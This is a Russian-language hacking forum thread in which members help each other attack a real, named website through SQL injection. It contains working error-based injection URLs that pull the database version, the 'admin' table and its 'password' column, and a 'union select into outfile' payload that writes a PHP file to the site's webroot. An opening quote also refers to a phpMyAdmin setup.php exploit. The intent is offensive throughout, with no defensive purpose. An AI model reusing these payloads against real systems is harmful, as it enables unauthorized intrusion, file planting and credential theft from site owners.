
26.06.2010, 22:25
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
Сообщение от None
Если ты следишь за лентами эксплойтов, то, наверняка, не должен был пропустить уязвимость популярнейшего менеджера баз данных MySql phpMyAdmin версий до 2.11.9 (http://www.gnucitizen.org/static/blog/2009/06/phpmyadminrcesh.txt).
Уязвимость заключалась в том, что скрипт установки ./scripts/setup.php вообще не проверял пользовательские данные, которые затем записывались в конфигурационный файл.
Эксплойт был всем хорош, кроме того, что администратор уязвимого хоста должен был вручную создать директорию ./config и дать ей права на запись (именно туда должен был записываться ядовитый конфиг), что на практике встречалось крайне редко. Настало время исправить это недоразумение.
script srazu vypolnyaet $ftp_code
|
|
|

26.06.2010, 22:28
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от 547
вроде блайнд,версия 5 хелп!!!
Код:
http://www.plan-art.co.uk/case.php?id=116+and+substring(@@version,1,1)=5--
Вы просто пипец..
Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос.
Сообщение от pinch
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+version()),floor(rand(0)*2))+from +information_schema.tables+group+by+2)a)--
Сообщение от 547
неплохо, но хотелосьбы получить еще базы,таблички,колонки...и потом выдрать инфу из таблички...
желательно в подробностях...
Сообщение от CyberHunter
table_name:
Код:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+table_name),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)+--+
admin
column_name:
Код:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+column_name),floor(rand(0)*2))+from+information_schema.columns+where+table_name='admin'+group+by+2)a)+--+
password
Вместо version() пиши то, что тебе нужно.
Может я старомоден, но люблю начинать с конца.
http://www.plan-art.co.uk/brochures.php?catid=-5+union+select+'',null+from+mysql.user+into+outfil e+'C:/plan/def/hello.php'
Урл без ввв > http://plan-art.co.uk/hello.php - палюсь
|
|
|

26.06.2010, 22:34
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от v1d0qz
Вы просто пипец..
Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос.
та я уже и сам допер на самом деле но всеравно спс...
просто непойму пока как вывести список всех таблиц а не одну? так само колонки...
|
|
|

26.06.2010, 22:37
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от 547
та я уже и сам допер на самом деле но всеравно спс...
просто непойму пока как вывести список всех таблиц а не одну? так само колонки...
насколько знаю не можешь
|
|
|

26.06.2010, 23:11
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
я думаю что можно
|
|
|

26.06.2010, 23:15
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от 547
я думаю что можно
ну так колдуй и покажи нам запрос, мне тоже интересно
|
|
|

26.06.2010, 23:23
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Konqi
ну так колдуй и покажи нам запрос, мне тоже интересно
пока ниче неполучается
|
|
|

26.06.2010, 23:30
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Груп_конкат там не катит, а значит нельзя.
|
|
|

26.06.2010, 23:33
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
а я о чем
|
|
|

26.06.2010, 23:38
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Konqi
а я о чем
значит только лимитом,или прогой что куда проще...
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|